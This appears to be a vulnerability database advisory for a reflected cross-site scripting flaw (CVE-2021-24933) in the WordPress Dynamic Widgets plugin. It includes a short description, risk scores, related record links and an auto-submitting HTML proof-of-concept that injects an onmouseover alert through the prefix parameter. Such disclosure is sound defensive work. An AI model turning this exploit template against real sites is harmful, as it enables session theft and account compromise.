Lucene search
JrXnmWPEX-ID:B8E6F0D3-A7D1-4CA8-ABA8-0D5075167D55HistoryDec 28, 2021 - 12:00 a.m.
Dynamic Widgets <= 1.5.16 - Reflected Cross-Site Scripting
2021-12-2800:00:00
JrXnm
85
0.001 Low
EPSS
Percentile
25.0%
The plugin does not escape the prefix parameter before outputting it back in an attribute when using the term_tree AJAX action (available to any authenticated users), leading to a Reflected Cross-Site Scripting issue
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="term_tree" />
<input type="hidden" name="prefix" value='xxxxxx" onmouseover=alert(/XSS/) test="' />
<input type="hidden" name="name" value="Uncategorizedory" />
<input type="hidden" name="widget_id" value="1" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
Related
cnvd
cnvd
WordPress Dynamic Widgets plugin cross-site scripting vulnerability
2022-03-02 00:00:00
cvelist
cvelist
CVE-2021-24933 Dynamic Widgets <= 1.5.16 - Reflected Cross-Site Scripting
2022-02-28 09:06:23
cve
cve
CVE-2021-24933
2022-02-28 09:15:08
wpvulndb
wpvulndb
Dynamic Widgets <= 1.5.16 - Reflected Cross-Site Scripting
2021-12-28 00:00:00
prion
prion
Cross site scripting
2022-02-28 09:15:00
nvd
nvd
CVE-2021-24933
2022-02-28 09:15:08
patchstack
patchstack